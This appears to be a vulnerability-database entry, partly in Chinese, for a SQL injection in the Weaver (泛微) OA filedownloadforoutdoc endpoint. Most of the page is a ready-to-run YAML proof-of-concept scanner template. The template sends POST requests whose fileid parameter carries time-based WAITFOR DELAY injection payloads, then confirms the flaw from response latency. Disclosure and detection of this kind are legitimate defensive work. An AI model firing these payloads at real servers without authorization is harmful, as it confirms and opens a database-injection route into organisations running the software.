ecology-filedownloadforoutdoc-sqli: 泛微 OA filedownloadforoutdoc - SQL injection

日期: 2025-09-01 | 影响软件: 泛微OA | POC: 已公开

漏洞描述

泛微 OA filedownloadforoutdoc interface has SQL injection

PoC代码[已公开]

id: ecology-filedownloadforoutdoc-sqli

info:
  name: 泛微 OA filedownloadforoutdoc - SQL injection
  author: zan8in
  severity: critical
  verified: true
  description: 泛微 OA filedownloadforoutdoc interface has SQL injection
  tags: ecology,sqli
  created: 2023/07/11

set:
  rand0: randomInt(100,199)
  rand1: randomInt(200,299)
  rand2: randomInt(300,399)
  rand3: randomInt(400,499)
rules:
  # r0:
  #   request:
  #     type: go
  #     data: ecology-filedownloadforoutdoc-sqli
  #   expression: |
  #     !response.raw.bcontains(b'No ecologyFiledownloadforoutdocSqli')
  r0:
    request:
      method: POST
      path: /weaver/weaver.file.FileDownloadForOutDoc
      body: isFromOutImg=1&fileid={{rand0}}+WAITFOR+DELAY+'0:0:10'
    expression: response.status == 200 && response.latency <= 12000 &&  response.latency >= 10000
  r1:
    request:
      method: POST
      path: /weaver/weaver.file.FileDownloadForOutDoc
      body: isFromOutImg=1&fileid={{rand0}}+WAITFOR+DELAY+'0:0:6'
    expression: response.status == 200 && response.latency <= 8000 &&  response.latency >= 6000
  r2:
    request:
      method: POST
      path: /weaver/weaver.file.FileDownloadForOutDoc
      body: isFromOutImg=1&fileid={{rand0}}+WAITFOR+DELAY+'0:0:10'
    expression: response.status == 200 && response.latency <= 12000 &&  response.latency >= 10000
  r3:
    request:
      method: POST
      path: /weaver/weaver.file.FileDownloadForOutDoc
      body: isFromOutImg=1&fileid={{rand0}}+WAITFOR+DELAY+'0:0:6'
    expression: response.status == 200 && response.latency <= 8000 &&  response.latency >= 6000
expression: r0() && r1() && r2() && r3()

相关漏洞推荐